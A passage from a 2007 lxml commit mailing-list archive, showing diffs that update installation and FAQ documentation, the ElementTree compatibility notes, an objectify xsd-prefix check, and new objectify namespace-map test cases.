deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. 
From scoder at codespeak.net Mon Jun 18 13:39:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 18 Jun 2007 13:39:03 +0200 (CEST) Subject: [Lxml-checkins] r44336 - in lxml/trunk: . doc Message-ID: <20070618113903.18BDA80C3@code0.codespeak.net> Author: scoder Date: Mon Jun 18 13:39:01 2007 New Revision: 44336 Modified: lxml/trunk/INSTALL.txt lxml/trunk/doc/FAQ.txt lxml/trunk/doc/compatibility.txt Log: doc merge from 1.3: build, install, compatibility, FAQ Modified: lxml/trunk/INSTALL.txt ============================================================================== --- lxml/trunk/INSTALL.txt (original) +++ lxml/trunk/INSTALL.txt Mon Jun 18 13:39:01 2007 @@ -8,10 +8,10 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. It can be found here: +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +19,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. 
- -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. _`how to build lxml from source`: build.html + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). + + +Building lxml from sources +-------------------------- -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +52,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. 
+ +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Mon Jun 18 13:39:01 2007 @@ -90,7 +90,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. 
Support for XML Schema and Schematron is currently incomplete in @@ -104,22 +104,23 @@ It really depends on your application, but the rule of thumb is: more recent versions contain less bugs and provide more features. -* Try to use versions of both libraries that were released together. +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. * If you use XML Schema or Schematron which are still under development, the -most recent version of libxml2 is usually a good bet. + most recent version of libxml2 is usually a good bet. * The same applies to XPath, where a substantial number of bugs and memory -leaks were fixed over time. If you encounter crashes or memory leaks in XPath -applications, try a more recent version of libxml2. + leaks were fixed over time. If you encounter crashes or memory leaks in + XPath applications, try a more recent version of libxml2. * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. * For the normal tree handling, however, any libxml2 version starting with -2.6.16 should do. + 2.6.20 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to -see if a specific bug has been fixed. +see when (or if) a specific bug has been fixed. .. _`release notes of libxml2`: http://xmlsoft.org/news.html .. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html Modified: lxml/trunk/doc/compatibility.txt ============================================================================== --- lxml/trunk/doc/compatibility.txt (original) +++ lxml/trunk/doc/compatibility.txt Mon Jun 18 13:39:01 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! 
- -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. * etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. + +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. 
* The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. + The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + correspondents to ``pi.target + " " + pi.text`` in lxml.etree. 
* Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element. This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. 
Note that lxml can deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. From scoder at codespeak.net Tue Jun 19 10:39:34 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 10:39:34 +0200 (CEST) Subject: [Lxml-checkins] r44360 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070619083934.5C44980DB@code0.codespeak.net> Author: scoder Date: Tue Jun 19 10:39:33 2007 New Revision: 44360 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: allow xsd prefixes in DataElement _xsd argument Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 19 10:39:33 2007 @@ -1664,6 +1664,7 @@ if the type can be identified. If '_pytype' or '_xsi' are among the keyword arguments, they will be used instead. """ + cdef python.PyObject* dict_result if nsmap is None: nsmap = _DEFAULT_NSMAP if attrib is not None: @@ -1671,12 +1672,19 @@ attrib.update(_attributes) _attributes = attrib if _xsi is not None: + if ':' in _xsi: + prefix, name = _xsi.split(':', 1) + ns = nsmap.get(prefix) + if ns != XML_SCHEMA_NS: + raise ValueError, "XSD types require the XSD namespace" python.PyDict_SetItem(_attributes, XML_SCHEMA_INSTANCE_TYPE_ATTR, _xsi) if _pytype is None: - # allow for s.o. 
using unregistered or even wrong xsi:type names - pytype_lookup = _SCHEMA_TYPE_DICT.get(_xsi) - if pytype_lookup is not None: - _pytype = pytype_lookup.name + # allow using unregistered or even wrong xsi:type names + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, _xsi) + if dict_result is NULL: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, name) + if dict_result is not NULL: + _pytype = (dict_result).name if python._isString(_value): strval = _value From scoder at codespeak.net Tue Jun 19 10:54:44 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 10:54:44 +0200 (CEST) Subject: [Lxml-checkins] r44362 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070619085444.E34F580EA@code0.codespeak.net> Author: scoder Date: Tue Jun 19 10:54:44 2007 New Revision: 44362 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: objectify testcases by Holger Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 19 10:54:44 2007 @@ -13,10 +13,14 @@ from lxml import objectify +PYTYPE_NAMESPACE = "http://codespeak.net/lxml/objectify/pytype" XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS +DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, + "xsi" : XML_SCHEMA_INSTANCE_NS, + "xsd" : XML_SCHEMA_NS} xml_str = '''\ @@ -52,6 +56,116 @@ self.etree.Namespace("otherNS").clear() objectify.setPytypeAttributeTag() + def test_element_nsmap(self): + # default nsmap + root = objectify.Element("test") + self.assertEquals(root.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root = objectify.Element("test", nsmap=nsmap) + 
self.assertEquals(root.nsmap.values(), [PYTYPE_NAMESPACE]) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + root = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.nsmap, nsmap) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root = objectify.Element("test", nsmap=nsmap) + self.assert_(PYTYPE_NAMESPACE in root.nsmap.values()) + for prefix, ns in nsmap.items(): + self.assert_(prefix in root.nsmap) + self.assertEquals(nsmap[prefix], root.nsmap[prefix]) + + def test_sub_element_nsmap(self): + root = objectify.Element("root") + # default nsmap + root.sub = objectify.Element("test") + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root.sub = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + root.sub = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root.sub = objectify.Element("test", nsmap=nsmap) + expected = nsmap.copy() + expected.update(DEFAULT_NSMAP) + self.assertEquals(root.sub.nsmap, expected) + + def test_data_element_nsmap(self): + # default nsmap + value = objectify.DataElement("test this") + self.assertEquals(value.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(value.nsmap.values(), [PYTYPE_NAMESPACE]) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + + value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(value.nsmap, nsmap) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + 
value = objectify.DataElement("test", nsmap=nsmap) + self.assert_(PYTYPE_NAMESPACE in value.nsmap.values()) + for prefix, ns in nsmap.items(): + self.assert_(prefix in value.nsmap) + self.assertEquals(nsmap[prefix], value.nsmap[prefix]) + + def test_sub_data_element_nsmap(self): + root = objectify.Element("root") + # default nsmap + root.value = objectify.DataElement("test this") + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root.value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + + root.value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root.value = objectify.DataElement("test", nsmap=nsmap) + expected = nsmap.copy() + expected.update(DEFAULT_NSMAP) + self.assertEquals(root.value.nsmap, expected) + def test_root(self): root = self.Element("test") self.assert_(isinstance(root, objectify.ObjectifiedElement)) @@ -287,8 +401,13 @@ Element = self.Element SubElement = self.etree.SubElement root = Element("{objectified}root") - root.none = 'true' - self.assert_(isinstance(root.none, objectify.BoolElement)) + root.bool = 'true' + self.assert_(isinstance(root.bool, objectify.BoolElement)) + self.assertEquals(root.bool, True) + + root.bool = 'false' + self.assert_(isinstance(root.bool, objectify.BoolElement)) + self.assertEquals(root.bool, False) def test_data_element_bool(self): value = objectify.DataElement(True) @@ -401,9 +520,9 @@ for b in root.b: self.assert_(isinstance(b, objectify.BoolElement)) - self.assertEquals(True, root.b[0]) + self.assertEquals(True, root.b[0]) self.assertEquals(False, root.b[1]) - self.assertEquals(True, root.b[2]) + self.assertEquals(True, root.b[2]) self.assertEquals(False, 
root.b[3]) for f in root.f: @@ -416,7 +535,7 @@ for l in root.l: self.assert_(isinstance(l, objectify.LongElement)) - self.assertEquals(5l, l) + self.assertEquals(5L, l) for i in root.i: self.assert_(isinstance(i, objectify.IntElement)) @@ -425,6 +544,75 @@ self.assert_(isinstance(root.n, objectify.NoneElement)) self.assertEquals(None, root.n) + def test_schema_types_prefixed(self): + XML = self.XML + root = XML('''\ + + true + false + 1 + 0 + + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + + + + ''') + + for b in root.b: + self.assert_(isinstance(b, objectify.BoolElement)) + self.assertEquals(True, root.b[0]) + self.assertEquals(False, root.b[1]) + self.assertEquals(True, root.b[2]) + self.assertEquals(False, root.b[3]) + + for f in root.f: + self.assert_(isinstance(f, objectify.FloatElement)) + self.assertEquals(5, f) + + for s in root.s: + self.assert_(isinstance(s, objectify.StringElement)) + self.assertEquals("5", s) + + for l in root.l: + self.assert_(isinstance(l, objectify.LongElement)) + self.assertEquals(5L, l) + + for i in root.i: + self.assert_(isinstance(i, objectify.IntElement)) + self.assertEquals(5, i) + + self.assert_(isinstance(root.n, objectify.NoneElement)) + self.assertEquals(None, root.n) + def test_type_str_sequence(self): XML = self.XML root = XML(u'whytry') @@ -522,19 +710,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("int", child_types[10]) - self.assertEquals("int", child_types[11]) - 
self.assertEquals("int", child_types[12]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -562,19 +750,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -610,7 +798,8 @@ XML = self.XML root = XML(u'''\ 
+ xmlns:py="http://codespeak.net/lxml/objectify/pytype" + xmlns:xsd="http://www.w3.org/2001/XMLSchema"> 5 test 1.1 @@ -618,9 +807,9 @@ true - 5 - 5 - 23 + 5 + 5 + 23 42 300 2 @@ -650,6 +839,51 @@ for c in root.getiterator(): self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) + def test_pytype_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root) + objectify.deannotate(root, xsi=False) + + child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) + for c in root.iterchildren() ] + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) + self.assertEquals("xsd:string", child_types[10]) + self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:long", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + for c in root.getiterator(): + self.assertEquals(None, c.get(objectify.PYTYPE_ATTRIBUTE)) + def test_change_pytype_attribute(self): XML = self.XML From scoder at codespeak.net Tue Jun 19 13:50:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 13:50:40 +0200 (CEST) Subject: [Lxml-checkins] r44365 - lxml/trunk/doc Message-ID: <20070619115040.54E3C80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 13:50:39 2007 New Revision: 44365 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ restructuring Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ 
lxml/trunk/doc/FAQ.txt Tue Jun 19 13:50:39 2007 @@ -18,31 +18,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Which version of libxml2 and libxslt should I use or require? - 1.5 Where are the Windows binaries? - 1.6 What is the difference between lxml.etree and lxml.objectify? - 1.7 How can I make my application run faster? - 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? 
+ 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -98,6 +99,51 @@ supports loading documents through HTTP and FTP. +What is the difference between lxml.etree and lxml.objectify? +------------------------------------------------------------- + +The two modules provide different ways of handling XML. However, objectify +builds on top of lxml.etree and therefore inherits most of its capabilities +and a large portion of its API. + +* lxml.etree is a generic API for XML and HTML handling. It aims for + ElementTree compatibility_ and supports the entire XML infoset. It is well + suited for both mixed content and data centric XML. Its generality makes it + the best choice for most applications. + +* lxml.objectify is a specialized API for XML data handling in a Python object + syntax. It provides a very natural way to deal with data fields stored in a + structurally well defined XML format. Data is automatically converted to + Python data types and can be manipulated with normal Python operators. Look + at the examples in the `objectify documentation`_ to see what it feels like + to use it. + + Objectify is not well suited for mixed contents or HTML documents. 
As it is + built on top of lxml.etree, however, it inherits the normal support for + XPath, XSLT or validation. + + +How can I make my application run faster? +----------------------------------------- + +lxml.etree is a very fast library for processing XML. There are, however, `a +few caveats`_ involved in the mapping of the powerful libxml2 library to the +simple and convenient ElementTree API. Not all operations are as fast as the +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. + +.. _`a few caveats`: performance.html#the-elementtree-api +.. _`benchmark page`: performance.html +.. _threading: #threading + + +Installation +============ + Which version of libxml2 and libxslt should I use or require? ------------------------------------------------------------- @@ -152,48 +198,6 @@ http://cheeseshop.python.org/pypi/lxml/1.1.2 -What is the difference between lxml.etree and lxml.objectify? -------------------------------------------------------------- - -The two modules provide different ways of handling XML. However, objectify -builds on top of lxml.etree and therefore inherits most of its capabilities -and a large portion of its API. - -* lxml.etree is a generic API for XML and HTML handling. It aims for - ElementTree compatibility_ and supports the entire XML infoset. It is well - suited for both mixed content and data centric XML. Its generality makes it - the best choice for most applications. - -* lxml.objectify is a specialized API for XML data handling in a Python object - syntax. It provides a very natural way to deal with data fields stored in a - structurally well defined XML format. 
Data is automatically converted to - Python data types and can be manipulated with normal Python operators. Look - at the examples in the `objectify documentation`_ to see what it feels like - to use it. - - Objectify is not well suited for mixed contents or HTML documents. As it is - built on top of lxml.etree, however, it inherits the normal support for - XPath, XSLT or validation. - - -How can I make my application run faster? ------------------------------------------ - -lxml.etree is a very fast library for processing XML. There are, however, `a -few caveats`_ involved in the mapping of the powerful libxml2 library to the -simple and convenient ElementTree API. Not all operations are as fast as the -simplicity of the API might suggest, while some use cases can heavily benefit -from finding the right way of doing them. The `benchmark page`_ has a -comparison to other ElementTree implementations and a number of tips for -performance tweaking. As with any Python application, the rule of thumb is: -the more of your processing runs in C, the faster your application gets. See -also the section on threading_. - -.. _`a few caveats`: performance.html#the-elementtree-api -.. _`benchmark page`: performance.html -.. _threading: #threading - - Why do I get errors about missing UCS4 symbols when installing lxml? 
-------------------------------------------------------------------- From scoder at codespeak.net Tue Jun 19 13:52:36 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 13:52:36 +0200 (CEST) Subject: [Lxml-checkins] r44366 - lxml/branch/lxml-1.3/doc Message-ID: <20070619115236.EEC0B80D8@code0.codespeak.net> Author: scoder Date: Tue Jun 19 13:52:35 2007 New Revision: 44366 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: FAQ merge from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 19 13:52:35 2007 @@ -19,31 +19,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Which version of libxml2 and libxslt should I use or require? - 1.5 Where are the Windows binaries? - 1.6 What is the difference between lxml.etree and lxml.objectify? - 1.7 How can I make my application run faster? - 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 